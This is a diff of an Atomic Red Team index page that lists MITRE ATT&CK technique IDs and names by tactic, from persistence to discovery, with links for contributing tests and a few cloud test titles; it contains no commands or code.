+- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1136.001 Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1554 Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1098 Account Manipulation](../../T1098/T1098.md)
+  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
+  - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
+  - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
+  - Atomic Test #17: GCP - Delete Service Account Key [iaas:gcp]
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1653 Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# command-and-control
+- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.003 Proxy: Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1571 Non-Standard Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.001 Application Layer Protocol: Web Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1105 Ingress Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.001 Proxy: Internal Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# collection
+- T1560.001 Archive Collected Data: Archive via Utility [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1113 Screen Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.001 Input Capture: Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1074.001 Data Staged: Local Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.001 Email Collection: Local Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1115 Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.002 Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# lateral-movement
+- T1021.005 Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.002 Remote Services: SMB/Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.006 Remote Services: Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.003 Remote Services: Distributed Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1563.002 Remote Service Session Hijacking: RDP Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.001 Remote Services: Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # credential-access
+- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.001 Input Capture: Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1552.005 Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md)
-  - Atomic Test #2: Azure - Dump Azure Instance Metadata from Virtual Machines [iaas:azure]
+- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.002 Unsecured Credentials: Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552 Unsecured Credentials](../../T1552/T1552.md)
   - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos, iaas:aws]
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.003 Credentials from Password Stores: Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.004 Unsecured Credentials: Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.001 OS Credential Dumping: LSASS Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
   - Atomic Test #9: AWS - Password Spray an AWS using GoAWSConsoleSpray [iaas:aws]
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.005 OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1555.006 Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1187 Forced Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.006 OS Credential Dumping: DCSync [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# discovery
+- T1033 System Owner/User Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016.001 System Network Configuration Discovery: Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.001 Account Discovery: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.001 Virtualization/Sandbox Evasion: System Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1135 Network Share Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1082 System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1217 Browser Bookmark Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016 System Network Configuration Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1482 Domain Trust Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1083 File and Directory Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1049 System Network Connections Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1057 Process Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
